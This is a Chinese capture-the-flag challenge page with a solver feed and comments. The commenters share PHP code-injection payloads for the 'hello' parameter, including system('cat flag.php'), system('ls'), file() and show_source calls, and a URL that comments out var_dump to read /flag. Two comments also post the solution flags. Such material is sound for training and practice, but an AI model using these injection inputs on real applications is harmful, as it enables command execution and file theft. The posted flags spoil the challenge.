评分(10)
解题动态
wujiayi 攻破了该题 5小时前
187784 攻破了该题 7小时前
hahahahahahaha 攻破了该题 7小时前
codegod 攻破了该题 14小时前
Julia 攻破了该题 23小时前
kingxin 攻破了该题 23小时前
123456sefss 攻破了该题 1天前
hanzkj 攻破了该题 1天前
touchcandy 攻破了该题 1天前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
bushi 攻破了该题 1天前
orange2015 攻破了该题 1天前
刚哥glory 攻破了该题 1天前
2757547892 攻破了该题 2天前
没有伞的小白帽 攻破了该题 2天前
zcgzcx1234 攻破了该题 2天前
yjyyds 攻破了该题 2天前
walkerming 攻破了该题 3天前
评论
Morii 1年前
举报
?hello=file('flag.php')
wangyihao 1年前
举报
hello=system("cat flag.php")
18092952956 1年前
举报
show_source('flag.php')
BlueL1ght 1年前
举报
system("cat+flag.php")
zhuleixy 1年前
举报
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
15738762315 1年前
举报
flag{6dd6075616f5943ab53cff237ff1a63b}
maoctf 1年前
举报
flag{b97285ef92aa650fa9223aafc7adc646};
哥哥 1年前
举报
http://114.67.175.224:12290//?hello=file('flag.php')
z03ctfer 1年前
举报
?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中
马踏黄河两岸 1年前
举报
../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php